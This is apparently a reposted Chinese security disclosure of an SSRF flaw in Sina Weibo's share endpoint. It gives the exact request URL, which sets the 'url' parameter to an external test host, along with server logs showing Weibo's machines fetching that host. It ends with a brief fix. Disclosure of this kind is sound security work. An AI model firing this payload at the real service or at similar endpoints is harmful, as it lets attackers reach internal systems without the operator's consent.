新浪微博某处SSRF漏洞

程序员文章站 2022-04-12 21:48:56

新浪微博某处SSRF漏洞想看看有多少公司认为SSRF不算漏洞 # 服务器 http://service.weibo.com # SSRF位置 http://service.weib...

新浪微博某处SSRF漏洞

想看看有多少公司认为SSRF不算漏洞

# 服务器

http://service.weibo.com

# SSRF位置

http://service.weibo.com/share/share.php?appkey=872034675&content=utf-8&url=http://fuzz.wuyun.org/hello?world&title=wyssrf&pic=

# 参数

url

# 远程服务器获取到请求

Connection from 180.149.135.16 port 8080 [tcp/webcache] accepted

GET /index.php?123=123 HTTP/1.1

X-Remote-API-Invoker: openapi

User-Agent: Jakarta Commons-HttpClient/3.1

Host: fuzz.wuyun.org:8080

Connection from 123.125.106.81 port 8080 [tcp/webcache] accepted

GET /index.php?1234=1234 HTTP/1.1

User-Agent: SinaWeiboBot

Host: fuzz.wuyun.org:8080

Accept: */*

Accept-Encoding: gzip,deflate

解决方案：

把用于取外网资源的API部署在不属于自己的机房

上一篇： php7.0.13 pdo无法开启问题

下一篇： Argument for @NotNull parameter 'name' of com/android/tools/idea/welcome/Platfor

新浪微博某处SSRF漏洞

Python使用新浪微博API发送微博的例子

新浪微博Android 5.4重磅升级蓝V的末日

新浪微博封面自定义图片怎么修改?

微博常用表情有哪些？新浪微博常用表情排行榜top10

PHP Curl模拟登录微信公众平台、新浪微博实例代码

新浪微博新规：美女模特今后禁发泳装、黑丝等性感大尺度照片

教你查看新浪微博风云榜

php利用curl抓取新浪微博内容示例

Android新浪微博下拉刷新(最新消息显示在最上面)

怎样设置新浪微博私信自动回复微博关注自动回复

新浪微博某处SSRF漏洞

Python使用新浪微博API发送微博的例子

新浪微博Android 5.4重磅升级 蓝V的末日

新浪微博封面自定义图片怎么修改?

微博常用表情有哪些？新浪微博常用表情排行榜top10

PHP Curl模拟登录微信公众平台、新浪微博实例代码

新浪微博新规：美女模特今后禁发泳装、黑丝等性感大尺度照片

教你查看新浪微博风云榜

php利用curl抓取新浪微博内容示例

Android新浪微博下拉刷新(最新消息显示在最上面)

怎样设置新浪微博私信自动回复 微博关注自动回复

新浪微博Android 5.4重磅升级蓝V的末日

怎样设置新浪微博私信自动回复微博关注自动回复